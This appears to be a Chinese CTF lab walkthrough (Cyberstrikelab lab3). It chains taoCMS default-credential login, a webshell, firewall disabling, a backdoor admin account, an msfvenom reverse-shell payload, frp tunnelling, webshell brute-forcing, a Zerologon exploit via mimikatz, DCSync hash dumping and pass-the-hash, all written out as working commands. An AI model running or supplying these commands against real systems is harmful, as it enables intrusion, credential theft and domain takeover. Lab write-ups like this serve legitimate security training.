【Cyberstrikelab】lab3
主机扫描
sudo nmap -sS --min-rate 10000 -f 192.168.10.0/24 -oN lab3.txt发现两台主机
192.168.10.10
对192.168.10.10进行详细的漏洞扫描
sudo nmap -sS --min-rate 10000 -f -p- 192.168.10.10 -oN lab3-192.168.10.10-ports.txt
taocms 3.0.1 本地文件泄露漏洞(CVE-2021-44983)
挨个尝试,发现3590端口是一个taoCMS
下面有一个管理口
查看源代码,发现有出现默认的账号密码
可以直接成功登录
本地文件包含得到flag1
根据提示说木马留在主页,打开文件管理系统,查看index.php文件的内容,发现木马
通过文件管理写webshell
生成一个免杀马
发现是system权限
关闭防火墙&添加用户&开启远程桌面
netsh advfirewall set allprofiles state off
REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f
net user dfz 123@abc /add
net localgroup Administrators dfz /addrs dfz /add
内网信息收集
发现192.168.20.0/24网段,并且没有域信息
fscan
通过远程桌面将fscan拖入到192.168.10.10进行内网扫描
发现还有192.168.20.20,192.168.20.30主机
上线MSF(冰蝎自带)
这里直接使用冰蝎的反弹shell功能
先用msf配置监听,注意这里要使用php的反弹shell payload
在冰蝎的解密填写好kali的主机IP和监听端口,点击连接
就可以得到shell
冰蝎反弹的不稳定,后面会断
上线MSF
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=172.16.233.2 LPORT=6000 -f exe -o win10.exe
这里直接用远程桌面拖入并运行,得到shell
迁移进程
搭建内网隧道
kali的配置文件,frps.ini
[common]
bind_addr = 0.0.0.0
bind_port = 7000
win10的配置文件,frpc.ini
[common]
server_addr = 172.16.233.2
server_port = 7000[socket]
type = tcp
remote_port = 8000
plugin = socks5 
配置下proxychasin4文件
192.168.20.20
刚开始扫描到192.168.20.20开放端口不多,这里使用fscan对192.168.20.20进行全端口扫描
Thinkphp
配置下kali的代理
然后访问8055得到thinkphp
但是没扫出什么漏洞
网页提示说,已经有木马的存在
webshell密码爆破
proxychains4 python2 awBruter.py -u "http://192.168.20.20:8055/index.php"
使用蚁剑连接
可以看到果然主页上存在一句话(PS:这里必须要用蚁剑来连接,冰蝎和哥斯拉因为是有加密的无法连接这个普通webshll)
找到flag
收集内网信息
对192.168.20.20收集内网信息,发现就只有这台电脑。但是存在域
192.168.20.30
使用fscan对192.158.20.30进行全方面的端口扫描
尝试ms17_010
尝试使用ms17_010,发现不行
CVE-2020-1472
使用mimikatz攻击
借助mimikatz.exe来进行攻击,使用zerologon漏洞进行置空
# cyberstrikelab.com是域
# WIN-7NRTJO59O7N$是一个域成员
mimikatz.exe "lsadump::zerologon /target:cyberstrikelab.com /ntlm /null /account:WIN-7NRTJO59O7N$ /exploit" "exit"
然后导出域管理hash
mimikatz.exe "lsadump::dcsync /csv /domain:cyberstrikelab.com /dc:WIN-7NRTJO59O7N.cyberstrikelab.com /user:administrator /authuser:WIN-7NRTJO59O7N$ /authpassword:\"\" /authntlm" "exit"
500 Administrator f349636281150c001081894de72b4e2b 51使用相关脚本攻击
也可以使用相关脚本进行攻击(https://github.com/dirkjanm/CVE-2020-1472)
将域密码置空
proxychains4 python3 cve-2020-1472-exploit.py WIN-7NRTJO59O7N 192.168.20.30
导出管理员hash
proxychains4 python3 secretsdump.py cyberstrikelab.com/WIN-7NRTJO59O7N\$@192.168.20.30 -no-pass -just-dc
PTH攻击
使用刚刚得到的Administrator的has进行PTH攻击
psexec.py在impacket的examples中
proxychains4 -q python3 psexec.py -hashes :f349636281150c001081894de72b4e2b cyberstrikelab.com/administrator@192.168.20.30